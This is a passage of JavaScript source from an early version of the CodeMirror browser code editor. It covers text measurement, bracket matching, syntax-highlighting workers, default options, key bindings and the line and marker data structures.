    function setLineClass(handle, className, bgClassName) {
      return changeLine(handle, function(line) {
        if (line.className != className || line.bgClassName != bgClassName) {
          line.className = className;
          line.bgClassName = bgClassName;
          return true;
        }
      });
    }
    function setLineHidden(handle, hidden) {
      return changeLine(handle, function(line, no) {
        if (line.hidden != hidden) {
          line.hidden = hidden;
          if (!options.lineWrapping) {
            var l = line.text;
            if (hidden && l.length == maxLine.length) {
              updateMaxLine = true;
            } else if (!hidden && l.length > maxLine.length) {
              maxLine = l; maxWidth = null; updateMaxLine = false;
            }
          }
          updateLineHeight(line, hidden ? 0 : 1);
          var fline = sel.from.line, tline = sel.to.line;
          if (hidden && (fline == no || tline == no)) {
            var from = fline == no ? skipHidden({line: fline, ch: 0}, fline, 0) : sel.from;
            var to = tline == no ? skipHidden({line: tline, ch: 0}, tline, 0) : sel.to;
            // Can't hide the last visible line, we'd have no place to put the cursor
            if (!to) return;
            setSelection(from, to);
          }
          return (gutterDirty = true);
        }
      });
    }

    function lineInfo(line) {
      if (typeof line == "number") {
        if (!isLine(line)) return null;
        var n = line;
        line = getLine(line);
        if (!line) return null;
      } else {
        var n = lineNo(line);
        if (n == null) return null;
      }
      var marker = line.gutterMarker;
      return {line: n, handle: line, text: line.text, markerText: marker && marker.text,
              markerClass: marker && marker.style, lineClass: line.className, bgClass: line.bgClassName};
    }

    function stringWidth(str) {
      measure.innerHTML = "<pre><span>x</span></pre>";
      measure.firstChild.firstChild.firstChild.nodeValue = str;
      return measure.firstChild.firstChild.offsetWidth || 10;
    }
    // These are used to go from pixel positions to character
    // positions, taking varying character widths into account.
    function charFromX(line, x) {
      if (x <= 0) return 0;
      var lineObj = getLine(line), text = lineObj.text;
      function getX(len) {
        return measureLine(lineObj, len).left;
      }
      var from = 0, fromX = 0, to = text.length, toX;
      // Guess a suitable upper bound for our search.
      var estimated = Math.min(to, Math.ceil(x / charWidth()));
      for (;;) {
        var estX = getX(estimated);
        if (estX <= x && estimated < to) estimated = Math.min(to, Math.ceil(estimated * 1.2));
        else {toX = estX; to = estimated; break;}
      }
      if (x > toX) return to;
      // Try to guess a suitable lower bound as well.
      estimated = Math.floor(to * 0.8); estX = getX(estimated);
      if (estX < x) {from = estimated; fromX = estX;}
      // Do a binary search between these bounds.
      for (;;) {
        if (to - from <= 1) return (toX - x > x - fromX) ? from : to;
        var middle = Math.ceil((from + to) / 2), middleX = getX(middle);
        if (middleX > x) {to = middle; toX = middleX;}
        else {from = middle; fromX = middleX;}
      }
    }

    var tempId = "CodeMirror-temp-" + Math.floor(Math.random() * 0xffffff).toString(16);
    function measureLine(line, ch) {
      if (ch == 0) return {top: 0, left: 0};
      var wbr = options.lineWrapping && ch < line.text.length &&
                spanAffectsWrapping.test(line.text.slice(ch - 1, ch + 1));
      measure.innerHTML = "<pre>" + line.getHTML(makeTab, ch, tempId, wbr) + "</pre>";
      var elt = document.getElementById(tempId);
      var top = elt.offsetTop, left = elt.offsetLeft;
      // Older IEs report zero offsets for spans directly after a wrap
      if (ie && top == 0 && left == 0) {
        var backup = document.createElement("span");
        backup.innerHTML = "x";
        elt.parentNode.insertBefore(backup, elt.nextSibling);
        top = backup.offsetTop;
      }
      return {top: top, left: left};
    }
    function localCoords(pos, inLineWrap) {
      var x, lh = textHeight(), y = lh * (heightAtLine(doc, pos.line) - (inLineWrap ? displayOffset : 0));
      if (pos.ch == 0) x = 0;
      else {
        var sp = measureLine(getLine(pos.line), pos.ch);
        x = sp.left;
        if (options.lineWrapping) y += Math.max(0, sp.top);
      }
      return {x: x, y: y, yBot: y + lh};
    }
    // Coords must be lineSpace-local
    function coordsChar(x, y) {
      if (y < 0) y = 0;
      var th = textHeight(), cw = charWidth(), heightPos = displayOffset + Math.floor(y / th);
      var lineNo = lineAtHeight(doc, heightPos);
      if (lineNo >= doc.size) return {line: doc.size - 1, ch: getLine(doc.size - 1).text.length};
      var lineObj = getLine(lineNo), text = lineObj.text;
      var tw = options.lineWrapping, innerOff = tw ? heightPos - heightAtLine(doc, lineNo) : 0;
      if (x <= 0 && innerOff == 0) return {line: lineNo, ch: 0};
      function getX(len) {
        var sp = measureLine(lineObj, len);
        if (tw) {
          var off = Math.round(sp.top / th);
          return Math.max(0, sp.left + (off - innerOff) * scroller.clientWidth);
        }
        return sp.left;
      }
      var from = 0, fromX = 0, to = text.length, toX;
      // Guess a suitable upper bound for our search.
      var estimated = Math.min(to, Math.ceil((x + innerOff * scroller.clientWidth * .9) / cw));
      for (;;) {
        var estX = getX(estimated);
        if (estX <= x && estimated < to) estimated = Math.min(to, Math.ceil(estimated * 1.2));
        else {toX = estX; to = estimated; break;}
      }
      if (x > toX) return {line: lineNo, ch: to};
      // Try to guess a suitable lower bound as well.
      estimated = Math.floor(to * 0.8); estX = getX(estimated);
      if (estX < x) {from = estimated; fromX = estX;}
      // Do a binary search between these bounds.
      for (;;) {
        if (to - from <= 1) return {line: lineNo, ch: (toX - x > x - fromX) ? from : to};
        var middle = Math.ceil((from + to) / 2), middleX = getX(middle);
        if (middleX > x) {to = middle; toX = middleX;}
        else {from = middle; fromX = middleX;}
      }
    }
    function pageCoords(pos) {
      var local = localCoords(pos, true), off = eltOffset(lineSpace);
      return {x: off.left + local.x, y: off.top + local.y, yBot: off.top + local.yBot};
    }

    var cachedHeight, cachedHeightFor, measureText;
    function textHeight() {
      if (measureText == null) {
        measureText = "<pre>";
        for (var i = 0; i < 49; ++i) measureText += "x<br/>";
        measureText += "x</pre>";
      }
      var offsetHeight = lineDiv.clientHeight;
      if (offsetHeight == cachedHeightFor) return cachedHeight;
      cachedHeightFor = offsetHeight;
      measure.innerHTML = measureText;
      cachedHeight = measure.firstChild.offsetHeight / 50 || 1;
      measure.innerHTML = "";
      return cachedHeight;
    }
    var cachedWidth, cachedWidthFor = 0;
    function charWidth() {
      if (scroller.clientWidth == cachedWidthFor) return cachedWidth;
      cachedWidthFor = scroller.clientWidth;
      return (cachedWidth = stringWidth("x"));
    }
    function paddingTop() {return lineSpace.offsetTop;}
    function paddingLeft() {return lineSpace.offsetLeft;}

    function posFromMouse(e, liberal) {
      var offW = eltOffset(scroller, true), x, y;
      // Fails unpredictably on IE[67] when mouse is dragged around quickly.
      try { x = e.clientX; y = e.clientY; } catch (e) { return null; }
      // This is a mess of a heuristic to try and determine whether a
      // scroll-bar was clicked or not, and to return null if one was
      // (and !liberal).
      if (!liberal && (x - offW.left > scroller.clientWidth || y - offW.top > scroller.clientHeight))
        return null;
      var offL = eltOffset(lineSpace, true);
      return coordsChar(x - offL.left, y - offL.top);
    }
    function onContextMenu(e) {
      var pos = posFromMouse(e), scrollPos = scrollbar.scrollTop;
      if (!pos || opera) return; // Opera is difficult.
      if (posEq(sel.from, sel.to) || posLess(pos, sel.from) || !posLess(pos, sel.to))
        operation(setCursor)(pos.line, pos.ch);

      var oldCSS = input.style.cssText;
      inputDiv.style.position = "absolute";
      input.style.cssText = "position: fixed; width: 30px; height: 30px; top: " + (e.clientY - 5) +
        "px; left: " + (e.clientX - 5) + "px; z-index: 1000; background: white; " +
        "border-width: 0; outline: none; overflow: hidden; opacity: .05; filter: alpha(opacity=5);";
      leaveInputAlone = true;
      var val = input.value = getSelection();
      focusInput();
      selectInput(input);
      function rehide() {
        var newVal = splitLines(input.value).join("\n");
        if (newVal != val && !options.readOnly) operation(replaceSelection)(newVal, "end");
        inputDiv.style.position = "relative";
        input.style.cssText = oldCSS;
        if (ie_lt9) scrollbar.scrollTop = scrollPos;
        leaveInputAlone = false;
        resetInput(true);
        slowPoll();
      }

      if (gecko) {
        e_stop(e);
        var mouseup = connect(window, "mouseup", function() {
          mouseup();
          setTimeout(rehide, 20);
        }, true);
      } else {
        setTimeout(rehide, 50);
      }
    }

    // Cursor-blinking
    function restartBlink() {
      clearInterval(blinker);
      var on = true;
      cursor.style.visibility = "";
      blinker = setInterval(function() {
        cursor.style.visibility = (on = !on) ? "" : "hidden";
      }, 650);
    }

    var matching = {"(": ")>", ")": "(<", "[": "]>", "]": "[<", "{": "}>", "}": "{<"};
    function matchBrackets(autoclear) {
      var head = sel.inverted ? sel.from : sel.to, line = getLine(head.line), pos = head.ch - 1;
      var match = (pos >= 0 && matching[line.text.charAt(pos)]) || matching[line.text.charAt(++pos)];
      if (!match) return;
      var ch = match.charAt(0), forward = match.charAt(1) == ">", d = forward ? 1 : -1, st = line.styles;
      for (var off = pos + 1, i = 0, e = st.length; i < e; i+=2)
        if ((off -= st[i].length) <= 0) {var style = st[i+1]; break;}

      var stack = [line.text.charAt(pos)], re = /[(){}[\]]/;
      function scan(line, from, to) {
        if (!line.text) return;
        var st = line.styles, pos = forward ? 0 : line.text.length - 1, cur;
        for (var i = forward ? 0 : st.length - 2, e = forward ? st.length : -2; i != e; i += 2*d) {
          var text = st[i];
          if (st[i+1] != style) {pos += d * text.length; continue;}
          for (var j = forward ? 0 : text.length - 1, te = forward ? text.length : -1; j != te; j += d, pos+=d) {
            if (pos >= from && pos < to && re.test(cur = text.charAt(j))) {
              var match = matching[cur];
              if (match.charAt(1) == ">" == forward) stack.push(cur);
              else if (stack.pop() != match.charAt(0)) return {pos: pos, match: false};
              else if (!stack.length) return {pos: pos, match: true};
            }
          }
        }
      }
      for (var i = head.line, e = forward ? Math.min(i + 100, doc.size) : Math.max(-1, i - 100); i != e; i+=d) {
        var line = getLine(i), first = i == head.line;
        var found = scan(line, first && forward ? pos + 1 : 0, first && !forward ? pos : line.text.length);
        if (found) break;
      }
      if (!found) found = {pos: null, match: false};
      var style = found.match ? "CodeMirror-matchingbracket" : "CodeMirror-nonmatchingbracket";
      var one = markText({line: head.line, ch: pos}, {line: head.line, ch: pos+1}, style),
          two = found.pos != null && markText({line: i, ch: found.pos}, {line: i, ch: found.pos + 1}, style);
      var clear = operation(function(){one.clear(); two && two.clear();});
      if (autoclear) setTimeout(clear, 800);
      else bracketHighlighted = clear;
    }

    // Finds the line to start with when starting a parse. Tries to
    // find a line with a stateAfter, so that it can start with a
    // valid state. If that fails, it returns the line with the
    // smallest indentation, which tends to need the least context to
    // parse correctly.
    function findStartLine(n) {
      var minindent, minline;
      for (var search = n, lim = n - 40; search > lim; --search) {
        if (search == 0) return 0;
        var line = getLine(search-1);
        if (line.stateAfter) return search;
        var indented = line.indentation(options.tabSize);
        if (minline == null || minindent > indented) {
          minline = search - 1;
          minindent = indented;
        }
      }
      return minline;
    }
    function getStateBefore(n) {
      var start = findStartLine(n), state = start && getLine(start-1).stateAfter;
      if (!state) state = startState(mode);
      else state = copyState(mode, state);
      doc.iter(start, n, function(line) {
        line.highlight(mode, state, options.tabSize);
        line.stateAfter = copyState(mode, state);
      });
      if (start < n) changes.push({from: start, to: n});
      if (n < doc.size && !getLine(n).stateAfter) work.push(n);
      return state;
    }
    function highlightLines(start, end) {
      var state = getStateBefore(start);
      doc.iter(start, end, function(line) {
        line.highlight(mode, state, options.tabSize);
        line.stateAfter = copyState(mode, state);
      });
    }
    function highlightWorker() {
      var end = +new Date + options.workTime;
      var foundWork = work.length;
      while (work.length) {
        if (!getLine(showingFrom).stateAfter) var task = showingFrom;
        else var task = work.pop();
        if (task >= doc.size) continue;
        var start = findStartLine(task), state = start && getLine(start-1).stateAfter;
        if (state) state = copyState(mode, state);
        else state = startState(mode);

        var unchanged = 0, compare = mode.compareStates, realChange = false,
            i = start, bail = false;
        doc.iter(i, doc.size, function(line) {
          var hadState = line.stateAfter;
          if (+new Date > end) {
            work.push(i);
            startWorker(options.workDelay);
            if (realChange) changes.push({from: task, to: i + 1});
            return (bail = true);
          }
          var changed = line.highlight(mode, state, options.tabSize);
          if (changed) realChange = true;
          line.stateAfter = copyState(mode, state);
          var done = null;
          if (compare) {
            var same = hadState && compare(hadState, state);
            if (same != Pass) done = !!same;
          }
          if (done == null) {
            if (changed !== false || !hadState) unchanged = 0;
            else if (++unchanged > 3 && (!mode.indent || mode.indent(hadState, "") == mode.indent(state, "")))
              done = true;
          }
          if (done) return true;
          ++i;
        });
        if (bail) return;
        if (realChange) changes.push({from: task, to: i + 1});
      }
      if (foundWork && options.onHighlightComplete)
        options.onHighlightComplete(instance);
    }
    function startWorker(time) {
      if (!work.length) return;
      highlight.set(time, operation(highlightWorker));
    }

    // Operations are used to wrap changes in such a way that each
    // change won't have to update the cursor and display (which would
    // be awkward, slow, and error-prone), but instead updates are
    // batched and then all combined and executed at once.
    function startOperation() {
      updateInput = userSelChange = textChanged = null;
      changes = []; selectionChanged = false; callbacks = [];
    }
    function endOperation() {
      if (updateMaxLine) computeMaxLength();
      if (maxLineChanged && !options.lineWrapping) {
        widthForcer.style.left = stringWidth(maxLine) + "px";
        maxLineChanged = false;
      }
      var newScrollPos, updated;
      if (selectionChanged) {
        var coords = calculateCursorCoords();
        newScrollPos = calculateScrollPos(coords.x, coords.y, coords.x, coords.yBot);
      }
      if (changes.length) updated = updateDisplay(changes, true, (newScrollPos ? newScrollPos.scrollTop : null));
      else {
        if (selectionChanged) updateSelection();
        if (gutterDirty) updateGutter();
      }
      if (newScrollPos) scrollCursorIntoView();
      if (selectionChanged) {scrollEditorIntoView(); restartBlink();}

      if (focused && !leaveInputAlone &&
          (updateInput === true || (updateInput !== false && selectionChanged)))
        resetInput(userSelChange);

      if (selectionChanged && options.matchBrackets)
        setTimeout(operation(function() {
          if (bracketHighlighted) {bracketHighlighted(); bracketHighlighted = null;}
          if (posEq(sel.from, sel.to)) matchBrackets(false);
        }), 20);
      var sc = selectionChanged, cbs = callbacks; // these can be reset by callbacks
      if (textChanged && options.onChange && instance)
        options.onChange(instance, textChanged);
      if (sc && options.onCursorActivity)
        options.onCursorActivity(instance);
      for (var i = 0; i < cbs.length; ++i) cbs[i](instance);
      if (updated && options.onUpdate) options.onUpdate(instance);
    }
    var nestedOperation = 0;
    function operation(f) {
      return function() {
        if (!nestedOperation++) startOperation();
        try {var result = f.apply(this, arguments);}
        finally {if (!--nestedOperation) endOperation();}
        return result;
      };
    }

    function compoundChange(f) {
      history.startCompound();
      try { return f(); } finally { history.endCompound(); }
    }

    for (var ext in extensions)
      if (extensions.propertyIsEnumerable(ext) &&
          !instance.propertyIsEnumerable(ext))
        instance[ext] = extensions[ext];
    return instance;
  } // (end of function CodeMirror)

  // The default configuration options.
  CodeMirror.defaults = {
    value: "",
    mode: null,
    theme: "default",
    indentUnit: 5,
    indentWithTabs: false,
    smartIndent: true,
    tabSize: 6,
    keyMap: "default",
    extraKeys: null,
    electricChars: true,
    autoClearEmptyLines: false,
    onKeyEvent: null,
    onDragEvent: null,
    lineWrapping: false,
    lineNumbers: false,
    gutter: false,
    fixedGutter: false,
    firstLineNumber: 1,
    readOnly: false,
    dragDrop: true,
    onChange: null,
    onCursorActivity: null,
    onGutterClick: null,
    onHighlightComplete: null,
    onUpdate: null,
    onFocus: null, onBlur: null, onScroll: null,
    matchBrackets: false,
    workTime: 100,
    workDelay: 200,
    pollInterval: 100,
    undoDepth: 40,
    tabindex: null,
    autofocus: null
  };

  var ios = /AppleWebKit/.test(navigator.userAgent) && /Mobile\/\w+/.test(navigator.userAgent);
  var mac = ios || /Mac/.test(navigator.platform);
  var win = /Win/.test(navigator.platform);

  // Known modes, by name and by MIME
  var modes = CodeMirror.modes = {}, mimeModes = CodeMirror.mimeModes = {};
  CodeMirror.defineMode = function(name, mode) {
    if (!CodeMirror.defaults.mode && name != "null") CodeMirror.defaults.mode = name;
    if (arguments.length > 2) {
      mode.dependencies = [];
      for (var i = 2; i < arguments.length; ++i) mode.dependencies.push(arguments[i]);
    }
    modes[name] = mode;
  };
  CodeMirror.defineMIME = function(mime, spec) {
    mimeModes[mime] = spec;
  };
  CodeMirror.resolveMode = function(spec) {
    if (typeof spec == "string" && mimeModes.hasOwnProperty(spec))
      spec = mimeModes[spec];
    else if (typeof spec == "string" && /^[\w\-]+\/[\w\-]+\+xml$/.test(spec))
      return CodeMirror.resolveMode("application/xml");
    if (typeof spec == "string") return {name: spec};
    else return spec || {name: "null"};
  };
  CodeMirror.getMode = function(options, spec) {
    var spec = CodeMirror.resolveMode(spec);
    var mfactory = modes[spec.name];
    if (!mfactory) return CodeMirror.getMode(options, "text/plain");
    return mfactory(options, spec);
  };
  CodeMirror.listModes = function() {
    var list = [];
    for (var m in modes)
      if (modes.propertyIsEnumerable(m)) list.push(m);
    return list;
  };
  CodeMirror.listMIMEs = function() {
    var list = [];
    for (var m in mimeModes)
      if (mimeModes.propertyIsEnumerable(m)) list.push({mime: m, mode: mimeModes[m]});
    return list;
  };

  var extensions = CodeMirror.extensions = {};
  CodeMirror.defineExtension = function(name, func) {
    extensions[name] = func;
  };

  var commands = CodeMirror.commands = {
    selectAll: function(cm) {cm.setSelection({line: 0, ch: 0}, {line: cm.lineCount() - 1});},
    killLine: function(cm) {
      var from = cm.getCursor(true), to = cm.getCursor(false), sel = !posEq(from, to);
      if (!sel && cm.getLine(from.line).length == from.ch) cm.replaceRange("", from, {line: from.line + 1, ch: 0});
      else cm.replaceRange("", from, sel ? to : {line: from.line});
    },
    deleteLine: function(cm) {var l = cm.getCursor().line; cm.replaceRange("", {line: l, ch: 0}, {line: l});},
    undo: function(cm) {cm.undo();},
    redo: function(cm) {cm.redo();},
    goDocStart: function(cm) {cm.setCursor(0, 0, true);},
    goDocEnd: function(cm) {cm.setSelection({line: cm.lineCount() - 1}, null, true);},
    goLineStart: function(cm) {cm.setCursor(cm.getCursor().line, 0, true);},
    goLineStartSmart: function(cm) {
      var cur = cm.getCursor();
      var text = cm.getLine(cur.line), firstNonWS = Math.max(0, text.search(/\S/));
      cm.setCursor(cur.line, cur.ch <= firstNonWS && cur.ch ? 0 : firstNonWS, true);
    },
    goLineEnd: function(cm) {cm.setSelection({line: cm.getCursor().line}, null, true);},
    goLineUp: function(cm) {cm.moveV(-1, "line");},
    goLineDown: function(cm) {cm.moveV(1, "line");},
    goPageUp: function(cm) {cm.moveV(-1, "page");},
    goPageDown: function(cm) {cm.moveV(1, "page");},
    goCharLeft: function(cm) {cm.moveH(-1, "char");},
    goCharRight: function(cm) {cm.moveH(1, "char");},
    goColumnLeft: function(cm) {cm.moveH(-1, "column");},
    goColumnRight: function(cm) {cm.moveH(1, "column");},
    goWordLeft: function(cm) {cm.moveH(-1, "word");},
    goWordRight: function(cm) {cm.moveH(1, "word");},
    delCharLeft: function(cm) {cm.deleteH(-1, "char");},
    delCharRight: function(cm) {cm.deleteH(1, "char");},
    delWordLeft: function(cm) {cm.deleteH(-1, "word");},
    delWordRight: function(cm) {cm.deleteH(1, "word");},
    indentAuto: function(cm) {cm.indentSelection("smart");},
    indentMore: function(cm) {cm.indentSelection("add");},
    indentLess: function(cm) {cm.indentSelection("subtract");},
    insertTab: function(cm) {cm.replaceSelection("\t", "end");},
    defaultTab: function(cm) {
      if (cm.somethingSelected()) cm.indentSelection("add");
      else cm.replaceSelection("\t", "end");
    },
    transposeChars: function(cm) {
      var cur = cm.getCursor(), line = cm.getLine(cur.line);
      if (cur.ch > 0 && cur.ch < line.length - 1)
        cm.replaceRange(line.charAt(cur.ch) + line.charAt(cur.ch - 1),
                        {line: cur.line, ch: cur.ch - 1}, {line: cur.line, ch: cur.ch + 1});
    },
    newlineAndIndent: function(cm) {
      cm.replaceSelection("\n", "end");
      cm.indentLine(cm.getCursor().line);
    },
    toggleOverwrite: function(cm) {cm.toggleOverwrite();}
  };

  var keyMap = CodeMirror.keyMap = {};
  keyMap.basic = {
    "Left": "goCharLeft", "Right": "goCharRight", "Up": "goLineUp", "Down": "goLineDown",
    "End": "goLineEnd", "Home": "goLineStartSmart", "PageUp": "goPageUp", "PageDown": "goPageDown",
    "Delete": "delCharRight", "Backspace": "delCharLeft", "Tab": "defaultTab", "Shift-Tab": "indentAuto",
    "Enter": "newlineAndIndent", "Insert": "toggleOverwrite"
  };
  // Note that the save and find-related commands aren't defined by
  // default. Unknown commands are simply ignored.
  keyMap.pcDefault = {
    "Ctrl-A": "selectAll", "Ctrl-D": "deleteLine", "Ctrl-Z": "undo", "Shift-Ctrl-Z": "redo", "Ctrl-Y": "redo",
    "Ctrl-Home": "goDocStart", "Alt-Up": "goDocStart", "Ctrl-End": "goDocEnd", "Ctrl-Down": "goDocEnd",
    "Ctrl-Left": "goWordLeft", "Ctrl-Right": "goWordRight", "Alt-Left": "goLineStart", "Alt-Right": "goLineEnd",
    "Ctrl-Backspace": "delWordLeft", "Ctrl-Delete": "delWordRight", "Ctrl-S": "save", "Ctrl-F": "find",
    "Ctrl-G": "findNext", "Shift-Ctrl-G": "findPrev", "Shift-Ctrl-F": "replace", "Shift-Ctrl-R": "replaceAll",
    "Ctrl-[": "indentLess", "Ctrl-]": "indentMore",
    fallthrough: "basic"
  };
  keyMap.macDefault = {
    "Cmd-A": "selectAll", "Cmd-D": "deleteLine", "Cmd-Z": "undo", "Shift-Cmd-Z": "redo", "Cmd-Y": "redo",
    "Cmd-Up": "goDocStart", "Cmd-End": "goDocEnd", "Cmd-Down": "goDocEnd", "Alt-Left": "goWordLeft",
    "Alt-Right": "goWordRight", "Cmd-Left": "goLineStart", "Cmd-Right": "goLineEnd", "Alt-Backspace": "delWordLeft",
    "Ctrl-Alt-Backspace": "delWordRight", "Alt-Delete": "delWordRight", "Cmd-S": "save", "Cmd-F": "find",
    "Cmd-G": "findNext", "Shift-Cmd-G": "findPrev", "Cmd-Alt-F": "replace", "Shift-Cmd-Alt-F": "replaceAll",
    "Cmd-[": "indentLess", "Cmd-]": "indentMore",
    fallthrough: ["basic", "emacsy"]
  };
  keyMap["default"] = mac ? keyMap.macDefault : keyMap.pcDefault;
  keyMap.emacsy = {
    "Ctrl-F": "goCharRight", "Ctrl-B": "goCharLeft", "Ctrl-P": "goLineUp", "Ctrl-N": "goLineDown",
    "Alt-F": "goWordRight", "Alt-B": "goWordLeft", "Ctrl-A": "goLineStart", "Ctrl-E": "goLineEnd",
    "Ctrl-V": "goPageUp", "Shift-Ctrl-V": "goPageDown", "Ctrl-D": "delCharRight", "Ctrl-H": "delCharLeft",
    "Alt-D": "delWordRight", "Alt-Backspace": "delWordLeft", "Ctrl-K": "killLine", "Ctrl-T": "transposeChars"
  };

  function getKeyMap(val) {
    if (typeof val == "string") return keyMap[val];
    else return val;
  }
  function lookupKey(name, extraMap, map, handle, stop) {
    function lookup(map) {
      map = getKeyMap(map);
      var found = map[name];
      if (found != null && handle(found)) return true;
      if (map.nofallthrough) {
        if (stop) stop();
        return true;
      }
      var fallthrough = map.fallthrough;
      if (fallthrough == null) return false;
      if (Object.prototype.toString.call(fallthrough) != "[object Array]")
        return lookup(fallthrough);
      for (var i = 0, e = fallthrough.length; i < e; ++i) {
        if (lookup(fallthrough[i])) return true;
      }
      return false;
    }
    if (extraMap && lookup(extraMap)) return true;
    return lookup(map);
  }
  function isModifierKey(event) {
    var name = keyNames[e_prop(event, "keyCode")];
    return name == "Ctrl" || name == "Alt" || name == "Shift" || name == "Mod";
  }

  CodeMirror.fromTextArea = function(textarea, options) {
    if (!options) options = {};
    options.value = textarea.value;
    if (!options.tabindex && textarea.tabindex)
      options.tabindex = textarea.tabindex;
    if (options.autofocus == null && textarea.getAttribute("autofocus") != null)
      options.autofocus = true;

    function save() {textarea.value = instance.getValue();}
    if (textarea.form) {
      // Deplorable hack to make the submit method do the right thing.
      var rmSubmit = connect(textarea.form, "submit", save, true);
      if (typeof textarea.form.submit == "function") {
        var realSubmit = textarea.form.submit;
        function wrappedSubmit() {
          save();
          textarea.form.submit = realSubmit;
          textarea.form.submit();
          textarea.form.submit = wrappedSubmit;
        }
        textarea.form.submit = wrappedSubmit;
      }
    }

    textarea.style.display = "none";
    var instance = CodeMirror(function(node) {
      textarea.parentNode.insertBefore(node, textarea.nextSibling);
    }, options);
    instance.save = save;
    instance.getTextArea = function() { return textarea; };
    instance.toTextArea = function() {
      save();
      textarea.parentNode.removeChild(instance.getWrapperElement());
      textarea.style.display = "";
      if (textarea.form) {
        rmSubmit();
        if (typeof textarea.form.submit == "function")
          textarea.form.submit = realSubmit;
      }
    };
    return instance;
  };

  // Utility functions for working with state. Exported because modes
  // sometimes need to do this.
  function copyState(mode, state) {
    if (state === true) return state;
    if (mode.copyState) return mode.copyState(state);
    var nstate = {};
    for (var n in state) {
      var val = state[n];
      if (val instanceof Array) val = val.concat([]);
      nstate[n] = val;
    }
    return nstate;
  }
  CodeMirror.copyState = copyState;
  function startState(mode, a1, a2) {
    return mode.startState ? mode.startState(a1, a2) : true;
  }
  CodeMirror.startState = startState;

  // The character stream used by a mode's parser.
  function StringStream(string, tabSize) {
    this.pos = this.start = 0;
    this.string = string;
    this.tabSize = tabSize || 8;
  }
  StringStream.prototype = {
    eol: function() {return this.pos >= this.string.length;},
    sol: function() {return this.pos == 0;},
    peek: function() {return this.string.charAt(this.pos);},
    next: function() {
      if (this.pos < this.string.length)
        return this.string.charAt(this.pos++);
    },
    eat: function(match) {
      var ch = this.string.charAt(this.pos);
      if (typeof match == "string") var ok = ch == match;
      else var ok = ch && (match.test ? match.test(ch) : match(ch));
      if (ok) {++this.pos; return ch;}
    },
    eatWhile: function(match) {
      var start = this.pos;
      while (this.eat(match)){}
      return this.pos > start;
    },
    eatSpace: function() {
      var start = this.pos;
      while (/[\s\u00a0]/.test(this.string.charAt(this.pos))) ++this.pos;
      return this.pos > start;
    },
    skipToEnd: function() {this.pos = this.string.length;},
    skipTo: function(ch) {
      var found = this.string.indexOf(ch, this.pos);
      if (found > -1) {this.pos = found; return true;}
    },
    backUp: function(n) {this.pos -= n;},
    column: function() {return countColumn(this.string, this.start, this.tabSize);},
    indentation: function() {return countColumn(this.string, null, this.tabSize);},
    match: function(pattern, consume, caseInsensitive) {
      if (typeof pattern == "string") {
        function cased(str) {return caseInsensitive ? str.toLowerCase() : str;}
        if (cased(this.string).indexOf(cased(pattern), this.pos) == this.pos) {
          if (consume !== false) this.pos += pattern.length;
          return true;
        }
      } else {
        var match = this.string.slice(this.pos).match(pattern);
        if (match && consume !== false) this.pos += match[0].length;
        return match;
      }
    },
    current: function(){return this.string.slice(this.start, this.pos);}
  };
  CodeMirror.StringStream = StringStream;

  function MarkedText(from, to, className, marker) {
    this.from = from; this.to = to; this.style = className; this.marker = marker;
  }
  MarkedText.prototype = {
    attach: function(line) { this.marker.set.push(line); },
    detach: function(line) {
      var ix = indexOf(this.marker.set, line);
      if (ix > -1) this.marker.set.splice(ix, 1);
    },
    split: function(pos, lenBefore) {
      if (this.to <= pos && this.to != null) return null;
      var from = this.from < pos || this.from == null ? null : this.from - pos + lenBefore;
      var to = this.to == null ? null : this.to - pos + lenBefore;
      return new MarkedText(from, to, this.style, this.marker);
    },
    dup: function() { return new MarkedText(null, null, this.style, this.marker); },
    clipTo: function(fromOpen, from, toOpen, to, diff) {
      if (fromOpen && to > this.from && (to < this.to || this.to == null))
        this.from = null;
      else if (this.from != null && this.from >= from)
        this.from = Math.max(to, this.from) + diff;
      if (toOpen && (from < this.to || this.to == null) && (from > this.from || this.from == null))
        this.to = null;
      else if (this.to != null && this.to > from)
        this.to = to < this.to ? this.to + diff : from;
    },
    isDead: function() { return this.from != null && this.to != null && this.from >= this.to; },
    sameSet: function(x) { return this.marker == x.marker; }
  };

  function Bookmark(pos) {
    this.from = pos; this.to = pos; this.line = null;
  }
  Bookmark.prototype = {
    attach: function(line) { this.line = line; },
    detach: function(line) { if (this.line == line) this.line = null; },
    split: function(pos, lenBefore) {
      if (pos < this.from) {
        this.from = this.to = (this.from - pos) + lenBefore;
        return this;
      }
    },
    isDead: function() { return this.from > this.to; },
    clipTo: function(fromOpen, from, toOpen, to, diff) {
      if ((fromOpen || from < this.from) && (toOpen || to > this.to)) {
        this.from = 0; this.to = -1;
      } else if (this.from > from) {
        this.from = this.to = Math.max(to, this.from) + diff;
      }
    },
    sameSet: function(x) { return false; },
    find: function() {
      if (!this.line || !this.line.parent) return null;
      return {line: lineNo(this.line), ch: this.from};
    },
    clear: function() {
      if (this.line) {
        var found = indexOf(this.line.marked, this);
        if (found != -1) this.line.marked.splice(found, 1);
        this.line = null;
      }
    }
  };

  // Line objects. These hold state related to a line, including
  // highlighting info (the styles array).
  function Line(text, styles) {
    this.styles = styles || [text, null];
    this.text = text;
    this.height = 1;
    this.marked = this.gutterMarker = this.className = this.bgClassName = this.handlers = null;
    this.stateAfter = this.parent = this.hidden = null;
  }
  Line.inheritMarks = function(text, orig) {
    var ln = new Line(text), mk = orig && orig.marked;
    if (mk) {
      for (var i = 0; i < mk.length; ++i) {
        if (mk[i].to == null && mk[i].style) {
          var newmk = ln.marked || (ln.marked = []), mark = mk[i];
          var nmark = mark.dup(); newmk.push(nmark); nmark.attach(ln);
        }
      }
    }
    return ln;
  }
  Line.prototype = {
    // Replace a piece of a line, keeping the styles around it intact.
    replace: function(from, to_, text) {
      var st = [], mk = this.marked, to = to_ == null ? this.text.length : to_;
      copyStyles(0, from, this.styles, st);
      if (text) st.push(text, null);
      copyStyles(to, this.text.length, this.styles, st);
      this.styles = st;
      this.text = this.text.slice(0, from) + text + this.text.slice(to);
      this.stateAfter = null;
      if (mk) {
        var diff = text.length - (to - from);
        for (var i = 0; i < mk.length; ++i) {
          var mark = mk[i];
          mark.clipTo(from == null, from || 0, to_ == null, to, diff);
          if (mark.isDead()) {mark.detach(this); mk.splice(i--, 1);}
        }
      }
    },
    // Split a part off a line, keeping styles and markers intact.
    split: function(pos, textBefore) {
      var st = [textBefore, null], mk = this.marked;
      copyStyles(pos, this.text.length, this.styles, st);
      var taken = new Line(textBefore + this.text.slice(pos), st);
      if (mk) {
        for (var i = 0; i < mk.length; ++i) {
          var mark = mk[i];
          var newmark = mark.split(pos, textBefore.length);
          if (newmark) {
            if (!taken.marked) taken.marked = [];
            taken.marked.push(newmark); newmark.attach(taken);
